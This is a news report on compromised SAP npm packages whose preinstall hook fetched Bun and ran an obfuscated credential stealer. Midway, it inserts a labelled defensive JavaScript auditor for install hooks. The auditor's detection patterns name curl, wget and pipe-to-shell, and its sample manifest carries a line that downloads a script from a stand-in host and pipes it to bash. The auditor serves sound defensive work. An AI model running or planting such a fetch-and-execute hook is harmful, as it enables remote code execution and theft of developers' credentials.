Several official SAP npm packages have been compromised in what researchers believe is a supply-chain attack linked to the TeamPCP threat group.
According to reports from Aikido Security and Socket, four npm packages commonly used in enterprise development were affected, including @cap-js/sqlite, @cap-js/postgres, @cap-js/db-service, and mbt. All of these are part of SAP’s Cloud Application Programming Model and Cloud MTA ecosystem. The compromised versions have since been deprecated on npm.
Researchers found that the attackers planted a malicious preinstall script into the packages. The script automatically executes during installation, launching a file that downloads the Bun JavaScript runtime from GitHub and runs an obfuscated payload. The malware is designed to steal sensitive data from developer systems and CI/CD pipelines, including authentication tokens, SSH keys, and cloud credentials for major platforms like AWS, Azure, and Google Cloud.
The payload also targets Kubernetes configurations and attempts to extract secrets directly from memory in CI environments. Once collected, the data is encrypted and uploaded to public GitHub repositories under the victim’s account. The repositories reportedly contain a message referencing “Shai-Hulud,” similar to strings observed in previous supply-chain attacks.
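The attack chain above hinges on an install-time lifecycle hook: a `preinstall` script that npm runs automatically, which in turn launches a file that fetches a runtime and executes a payload. The following is an added example, not code from SAP, Aikido Security or Socket, of how a defender can audit the package manifests in a dependency tree for that pattern before trusting an install. The manifests and the indicator patterns are constructed for illustration and are assumptions, not a vetted detection ruleset.

```javascript
// Added example: audit install-time lifecycle scripts in package manifests.
// Not SAP's code and not from the researchers cited in the article above.

// npm runs these hooks without prompting during `npm install`.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];

// Heuristic indicators (assumed for illustration). A legitimate native addon
// usually only runs a build tool here; a hook that fetches from the network,
// pulls in another runtime, or pipes to a shell deserves a manual look.
const INDICATORS = [
  { id: "preinstall-hook", test: (hook, _cmd) => hook === "preinstall" },
  { id: "remote-fetch",    test: (_hook, cmd) => /\b(curl|wget)\b|https?:\/\//i.test(cmd) },
  { id: "alt-runtime",     test: (_hook, cmd) => /\b(bun|deno)\b/i.test(cmd) },
  { id: "pipe-to-shell",   test: (_hook, cmd) => /\|\s*(sh|bash)\b/.test(cmd) },
  { id: "decode-or-eval",  test: (_hook, cmd) => /base64|\beval\b/i.test(cmd) },
  { id: "launches-script", test: (_hook, cmd) => /\bnode\s+\S+\.c?js\b/i.test(cmd) },
];

// Parse the raw text of a package.json file into a manifest object.
function parsePackageJson(text) {
  const manifest = JSON.parse(text);
  if (typeof manifest.name !== "string") {
    throw new Error("manifest has no package name");
  }
  return manifest;
}

// Return one finding per install hook that matches at least one indicator.
function auditManifest(manifest) {
  const findings = [];
  const scripts = manifest.scripts || {};
  for (const hook of INSTALL_HOOKS) {
    const cmd = scripts[hook];
    if (typeof cmd !== "string") continue;
    const indicators = INDICATORS.filter((i) => i.test(hook, cmd)).map((i) => i.id);
    if (indicators.length > 0) {
      findings.push({
        pkg: `${manifest.name}@${manifest.version}`,
        hook,
        cmd,
        indicators,
      });
    }
  }
  return findings;
}

// Audit every manifest collected from a dependency tree.
function auditTree(manifests) {
  return manifests.flatMap(auditManifest);
}

// Constructed sample manifests (not real npm metadata). The last two imitate
// the hook shapes described above; the first two are benign controls.
const SAMPLE_MANIFESTS = [
  { name: "good-native-addon", version: "2.1.0",
    scripts: { postinstall: "node-gyp rebuild", test: "mocha" } },
  { name: "plain-lib", version: "1.0.0",
    scripts: { test: "jest" } },
  { name: "@example/compromised-lib", version: "9.9.9",
    scripts: { preinstall: "node setup_environment.js" } },
  { name: "@example/other-bad", version: "0.0.1",
    scripts: { postinstall: "curl -fsSL https://example.invalid/bun.sh | bash" } },
];

// Human-readable report for a set of findings.
function formatReport(findings) {
  if (findings.length === 0) return "no suspicious install hooks found";
  return findings
    .map((f) => `${f.pkg} ${f.hook}: "${f.cmd}" [${f.indicators.join(", ")}]`)
    .join("\n");
}

console.log(formatReport(auditTree(SAMPLE_MANIFESTS)));
```

In practice the manifests would come from every `package.json` under `node_modules` (or from the registry metadata for each entry in the lockfile) and the audit would run in CI before any install step that executes scripts. Pairing this with `npm install --ignore-scripts`, and only re-enabling scripts for the specific packages that genuinely need a native build, removes the automatic execution that the compromised `preinstall` hook relied on.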
Security experts say the malware is capable of spreading further by using stolen credentials to modify additional npm packages and repositories, inserting the same malicious code to expand its reach. The tactics resemble previous incidents attributed to TeamPCP, including attacks on tools like Trivy, Checkmarx, and Bitwarden.
It is not yet clear how the threat actors compromised SAP’s publishing mechanism. Security engineer Adnan Khan suggests that an exposed npm token, possibly leaked by a misconfigured CI job, may have allowed the attackers to publish the compromised packages.